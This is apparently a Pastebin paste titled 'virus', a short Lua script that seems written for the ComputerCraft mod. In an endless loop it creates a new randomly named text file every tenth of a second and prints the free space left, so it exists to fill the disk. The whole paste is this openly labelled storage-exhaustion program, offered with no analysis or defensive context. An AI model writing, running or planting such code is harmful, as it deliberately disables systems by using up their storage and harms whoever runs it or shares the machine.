PouPeuu

virus

Nov 29th, 2021 (edited)
252
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.32 KB | None | 0 0
  1. if not fs.exists("shit.txt") then
  2.     local epic = fs.open("shit.txt","w")
  3.     epic.close()
  4. end
  5. while true do
  6.     os.sleep(0.1)
  7.     local val = math.random(1,2147483647)
  8.     local shit = fs.open(val..".txt","a")
  9.     shit.writeLine(val)
  10.     print("Memory left: "..fs.getFreeSpace("/"))
  11.     print(val)
  12.     shit.close()
  13. end
Add Comment
Please, Sign In to add comment